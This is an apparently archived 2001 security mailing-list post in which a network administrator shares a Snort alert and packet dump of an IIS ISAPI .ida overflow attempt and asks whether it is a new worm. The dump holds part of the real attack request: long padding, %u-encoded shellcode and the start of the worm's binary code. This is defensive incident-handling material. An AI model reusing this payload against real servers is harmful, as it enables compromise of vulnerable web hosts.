Hi All, Snort just reported an ISAPI overflow attempt here.I have specific rules in place for all the CodeRed worms, so I had to take a look at the packet log. Anyone else seen this one, a new worm ,or is it just a random event ?. Rgds, Dave [**] IDS552/web-iis_IIS ISAPI Overflow ida [**] 08/06-10:13:55.165739 210.209.11.12:4715 -> <SNIPPED>:80 TCP TTL:109 TOS:0x0 ID:43198 IpLen:20 DgmLen:576 ***A**** Seq: 0xCB1D4D1C Ack: 0xE4E9D43F Win: 0x4470 TcpLen: 20 47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61 GET /default.ida 3F 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 ?XXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 58 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 X%u9090%u6858%uc 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 bd3%u7801%u9090% 75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30 u6858%ucbd3%u780 31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 1%u9090%u6858%uc 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 bd3%u7801%u9090% 75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63 u9090%u8190%u00c 33 25 75 30 30 30 33 25 75 38 62 30 30 25 75 35 3%u0003%u8b00%u5 33 31 62 25 75 35 33 66 66 25 75 30 30 37 38 25 31b%u53ff%u0078% 75 30 30 30 30 25 75 30 30 3D 61 20 20 48 54 54 u0000%u00=a HTT 50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74 P/1.0..Content-t 79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A 43 6F ype: text/xml.Co 6E 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 33 ntent-length: 33 37 39 20 0D 0A 0D 0A C8 C8 01 00 60 E8 03 00 00 79 ........`.... 00 CC EB FE 64 67 FF 36 00 00 64 67 89 26 00 00 ....dg.6..dg.&.. E8 DF 02 00 00 68 04 01 00 00 8D 85 5C FE FF FF .....h......\... 50 FF 55 9C 8D 85 5C FE FF FF 50 FF 55 98 8B 40 P.U...\...P.U..@ 10 8B 08 89 8D 58 FE FF FF FF 55 E4 3D 04 04 00 .....X....U.=... 00 0F 94 C1 3D 04 08 00 00 0F 94 C5 0A CD 0F B6 ....=........... C9 89 8D 54 FE FF FF 8B ...T.... ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Sun Aug 05 2001 - 19:42:05 PDT